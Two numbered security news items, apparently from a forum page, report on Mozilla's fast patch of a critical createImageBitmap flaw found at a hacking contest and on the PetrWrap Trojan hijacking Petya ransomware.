  24. Mozilla Fixes Critical Vulnerability in Firefox 22 Hours After Discovery White hats were rewarded $30,000 for the effort The new Firefox version 52.0.1 which was released late on Friday contains the patch for the flaw discovered by hackers in the competition. The fix was confirmed via Twitter by Asa Dotzler, Mozilla participation director for Firefox OS, as well as Daniel Veditz, security team member at Mozilla. The bug was discovered by the Chaitin Security Research Lab from China. The hackers managed to escalate privileges in an exploit during the hacking competition by combining the bug with an initialized buffer in the Windows kernel. The bug bounty for this particular vulnerability was of $30,000 indicating that it was a serious matter. In a security advisory published by Mozilla, the company marks the integer overflow in the createImageBitmap() as "critical." They say that the bug was fixed in the newest version by disabling experimental extensions to the createImageBitmap API. Mozilla also claims that since the function works int he content sandbox, it would have required a second vulnerability to compromise a user's computer. Chaitin used, in this instance, the Windows kernel. Largest awards so far Many vulnerabilities were discovered during the hacking competition. So far, few have been fixed, and definitely not many as fast as the one Mozilla patched up in Firefox. Microsoft and Apple are two of the companies people are waiting to hear from int his regard In total, contestants were awarded $833,000 for the discovered vulnerabilities this year, nearly double than what was awarded last year. In 2016, the awards reached $460,000 and the previous year $577,000. In the end, it all depends on how good a day the hackers have to find something critical to exploit. Source
  25. The attackers patch Petya on the fly to use their own encryption key, bypassing the malware's original creators in the process In a case of no honor among thieves, a group of attackers has found a way to hijack the Petya ransomware and use it in targeted attacks against companies without the program creators' knowledge. A computer Trojan dubbed PetrWrap, being used in attacks against enterprise networks, installs Petya on computers and then patches it on the fly to suit its needs, according to security researchers from antivirus vendor Kaspersky Lab. The Trojan uses programmatic methods to trick Petya to use a different encryption key than the one its original creators have embedded inside its code. This ensures that only the PetrWrap attackers can restore the affected computers to their previous state. The Trojan also removes all mentions of Petya from the ransom message, as well as its signature red skull designed in ASCII. Petya first appeared a year ago and immediately stood out from other ransomware programs. Instead of encrypting files directly, it replaces the hard drive's master boot record (MBR) code, which normally starts the operating system, with malicious code that encrypts the drive's master file table (MFT). The MFT is a special file on NTFS volumes that contains information about all other files: their name, size, and mapping to hard disk sectors. The actual contents of the user's files are not encrypted, but without the MFT, the OS no longer knows where those files are located on disk. Unlike other ransomware infections that only lock access to certain files by encrypting them, Petya locks access to the entire computer. With a corrupted MBR and MFT, the operating system will no longer start, and users will only be greeted by a ransom message on the screen when they turn on their computer. The decision to hijack and use Petya without its authors' consent is clever because it solves several problems for the PetrWrap attackers. First of all, they don't have to write their own ransomware program, which is hard to get right, and they don't have to pay someone else for a ready-made solution either. Second, because it has been around for a while, Petya has had time to mature into a well-developed piece of malware. The PetrWrap attackers use Petya version 3, the latest variant of the program, which, unlike previous versions, has no known flaws. That's because its creators have perfected their encryption implementation over time. Creating something like Petya from scratch would not only be prone to errors but would also require knowledge of writing low-level bootloader code for the MBR. Once inside a network, the PetrWrap attackers look for and steal administrative credentials. They then use the PsExec tool to deploy the malware to all endpoint computers and servers they can access. There is no tool to decrypt the MFT of hard disk volumes affected by Petya, but because this malware doesn't actually encrypt the file contents, some data recovery tools might be able to reconstruct the files from hard disk raw data.
  • Create New...